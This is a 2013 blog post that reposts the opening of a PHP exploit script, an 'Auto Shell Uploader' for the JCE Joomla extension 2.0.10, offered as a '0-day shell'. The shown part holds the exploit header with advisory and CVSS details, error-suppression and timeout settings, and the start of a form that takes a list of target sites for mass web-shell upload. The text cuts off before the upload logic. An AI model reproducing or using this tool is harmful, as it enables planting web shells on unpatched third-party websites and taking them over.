Sunday, 24 March 2013

Joomla 0-Day Shell

Posted on 01:39 by Eagle Eye

<?php
######################################### ########################################
#
#                     AmnPardaz Security Research & Penetration Testing Group
#
#
# Title:                  Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 - PHP Version
# Author: HocineOverX
# Vendor:                 http://www.joomlacontenteditor.net
# Vulnerable Version:     JCE 2.0.10 (prior versions also may be affected)
# Exploitation:           Remote with browser
# Original Advisory:      http://www.bugreport.ir/index_78.htm
# Vendor supplied patch:  http://www.joomlacontenteditor.net/news/item/jce-2011-released
# CVSS2 Base Score:       (AV:N/AC:L/Au:N/C:P/I:P/A:P) --> 7.5        
# Coded By:               Mostafa Azizi
###################################################################################################

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);

echo'<html>
<head>
<title>JCE Joomla Extension Remote File Upload</title>
</head>

<body bgcolor="#00000">

<p align="center"><font size="4" color="#00ff00">TurkGuvenligi.net 0day Joomla shell Uploader</font></p>
</font>
<table width="90%">
  <tbody>
    <tr>
      <td width="43%" align="left">
        <form name="form1" action="'.$SERVER[PHP_SELF].'" enctype="multipart/form-data"  method="post">
          <p></font><font color="#00ff00" > siteleri aþaðýdaki kutuya yazýn (ex:www.sitename.com):    </font><br><textarea name="sitelist" cols="40" rows="10" class="siyah" id="sitelist">
Categories:

1 comment: